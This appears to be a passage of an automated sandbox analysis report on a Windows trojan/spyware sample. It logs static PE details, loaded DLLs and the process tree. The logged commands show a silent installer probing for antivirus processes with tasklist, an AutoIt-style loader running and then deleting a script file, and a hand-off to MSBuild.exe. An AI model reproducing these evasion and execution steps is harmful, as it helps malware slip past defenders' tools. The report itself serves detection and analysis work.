          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00408DA036_2_00408DA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00426F8236_2_00426F82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00434F8036_2_00434F80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00441F8036_2_00441F80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00409F9C36_2_00409F9C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00404FA036_2_00404FA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 36_2_00409FA836_2_00409FA8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0041C2A0 appears 176 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0040C8C0 appears 71 times
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: String function: 00B2FA3B appears 33 times
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: String function: 00B4488E appears 34 times
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: String function: 00B41000 appears 41 times
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: String function: 00B4014F appears 40 times
          Source: file.exeStatic PE information: invalid certificate
          Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
          Source: file.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
          Source: file.tmp.0.drStatic PE information: Number of sections : 11 > 10
          Source: file.tmp.2.drStatic PE information: Number of sections : 11 > 10
          Source: file.exeStatic PE information: Number of sections : 11 > 10
          Source: is-EUGF2.tmp.3.drStatic PE information: No import functions for PE file found
          Source: is-5MQFH.tmp.3.drStatic PE information: No import functions for PE file found
          Source: file.exe, 00000000.00000003.1677553862.000000007FB6A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs file.exe
          Source: file.exe, 00000000.00000003.1676905528.000000000337E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs file.exe
          Source: file.exe, 00000000.00000000.1675519930.0000000001059000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs file.exe
          Source: file.exeBinary or memory string: OriginalFileName vs file.exe
          Source: file.exeBinary or memory string: OriginalFileName vs file.exe
          Source: file.exeBinary or memory string: \OriginalFileName vs file.exe
          Source: file.exeBinary or memory string: OriginalFilenamewebpconverter.exeP vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@60/28@1/2
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B94573 GetLastError,FormatMessageW,35_2_00B94573
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B821C9 AdjustTokenPrivileges,CloseHandle,35_2_00B821C9
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B827D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,35_2_00B827D9
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B95D7E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,35_2_00B95D7E
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B8E2AB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CompareStringW,CloseHandle,35_2_00B8E2AB
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B88056 CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode,35_2_00B88056
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B93DBD CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,35_2_00B93DBD
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpFile created: C:\Users\user\AppData\Local\hangbirdJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmpJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
          Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
          Source: file.exeString found in binary or memory: /LOADINF="filename"
          Source: file.exeString found in binary or memory: ] [json.exception.parse errorparse_error, column at line invalid_iteratortype_errorout_of_rangeother_errorSeIncreaseQuotaPrivilege" \bin\EnableVROverlay_x64.exe -dt -nvft -spmon -excludelist_file "\ExcludeList.overlay.txt" \bin\PresentMon_x64.exe -timed -terminate_after_timed -hotkey SCROLLLOCK -output_file "\FrameView.csv" -frameview -multi_csv -stop_existing_session -session_name FrameViewService -dont_restart_as_admin \ExcludeList.txt" -exclude dwm.exe -session_name -spawnprovider -spawnconsumer -terminate_existing signaturedb\NVIDIA Corporation\FrameViewSDK\downloader\mouseLut.json\..\bin\mouseLut.json\bin\nvrla.exe -e \bin{}{
          Source: file.exeString found in binary or memory: FrameView SDK service-uninstallFvSvc-service-testservice-install-startRSA1
          Source: file.exeString found in binary or memory: FrameView SDK service-uninstallFvSvc-service-testservice-install-startRSA1
          Source: file.exeString found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
          Source: file.exeString found in binary or memory: application/vnd.groove-help
          Source: file.exeString found in binary or memory: "application/x-install-instructions
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp" /SL5="$40476,2820349,845824,C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp" /SL5="$2047E,2820349,845824,C:\Users\user\Desktop\file.exe" /VERYSILENT
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Users\user\AppData\Local\hangbird\Updater.exe "C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv"
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\hangbird\Updater.exe updater.exe C:\ProgramData\\bYrIyAT.a3x
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp" /SL5="$40476,2820349,845824,C:\Users\user\Desktop\file.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENTJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp" /SL5="$2047E,2820349,845824,C:\Users\user\Desktop\file.exe" /VERYSILENTJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess created: C:\Users\user\AppData\Local\hangbird\Updater.exe "C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3xJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\hangbird\Updater.exe updater.exe C:\ProgramData\\bYrIyAT.a3xJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: sfc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: sfc_os.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: explorerframe.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
